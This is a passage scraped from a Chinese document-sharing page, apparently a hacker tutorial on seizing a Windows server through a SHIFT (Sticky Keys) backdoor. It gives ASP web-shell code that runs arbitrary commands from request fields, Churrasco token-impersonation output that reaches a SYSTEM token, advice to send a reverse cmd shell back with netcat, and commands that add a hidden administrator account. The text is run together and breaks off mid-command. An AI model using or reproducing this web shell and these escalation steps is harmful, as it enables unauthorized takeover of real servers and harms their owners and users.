利用SHIFT后门拿服务器的方法.docx

《利用SHIFT后门拿服务器的方法.docx》由会员上传分享，免费在线阅读，更多相关内容在工程资料-天天文库。

1、利用SHIft后门拿只有想不到的服务没有做不到的器方法　　那么在这里我写点自己提权时所用到几个小方法!也是自己实战得来的经验!　　方法如有不对的请大家多多指点!　　提权时要到的工具如下：cmd.exeChurrasco.exenc.exe　　以上就是今天主要讲的!东西是死的!人是活的!就看你怎么用了!　　用以上工具先要确定SHELL里wscript.shell命令行执行组件是否可用!如不能用用以下方法进行调用!如调用也不行!那么就请你另想办法!　　代码如下：

2、D5-D70A-438B-8A42-98424B88AFB8"><%iferrthen%><%endif%>

3、type=submitvalue="netuser"><%OnErrorResumeNextifrequest("cmdx")="C:RECYCLERcmd.exe"thenresponse.writeoScriptlhn.exec("cmd.exe/c"&request("cmd")).stdout.readallendifresponse.writeoScriptlhn.exec(request("cmdx")&"/c"&request("cmd")).stdout.readall%>

4、area>　　将以上代码保存为cmd.asp上传到SHELL里再访问这个CMD.asp如没有出错等就说明可以执行CMD命令!　　下面先来将Churrasco.exe怎么用才能更好的发挥它的作用!有很多朋友问我为什么我上传的Churrasco.exe执行命令时没有出现命令成功原因有几种这里我就不多说了!那么这时我们要想到Churrasco.exe行命令时没有出现命令成功但出现/churrasco/-->CurrentUser:NETWORKSERVICE/churrasco/-->GettingRpcssPID.../churrasco/-->FoundRpcssPID:696/ch

5、urrasco/-->SearchingforRpcssthreads.../churrasco/-->FoundThread:444/churrasco/-->Threadnotimpersonating,lookingforanotherthread.../churrasco/-->FoundThread:700/churrasco/-->Threadnotimpersonating,lookingforanotherthread.../churrasco/-->FoundThread:704/churrasco/-->Threadnotimpersonating,lookin

6、gforanotherthread.../churrasco/-->FoundThread:712/churrasco/-->Threadimpersonating,gotNETWORKSERVICEToken:0xf24/churrasco/-->GettingSYSTEMtokenfromRpcssService.../churrasco/-->FoundszywjsToken/churrasco/-->FoundSYSTEMtoken0xf1c/churrasco/-->RunningcommandwithSYSTEMToken...　　直到这里没有出现命令执行成功那么这时你

7、千万不要放弃!离成功加差一步!这里你就用NC进行反弹一个CMDSHELL看下如果反弹回来的CMDSHELL权限很大的话那我就不用说了!如果说权限很小的这里你也有很大的希望了!　　在反弹回来的CMDSHELL里执行C:RECYCLERChurrasco.exe"netuseriisuseriisuser/add”　　C:RECYCLERChurrasco.exe"netlocalgroupadministratorsiisuser/add"　　C:RECYCL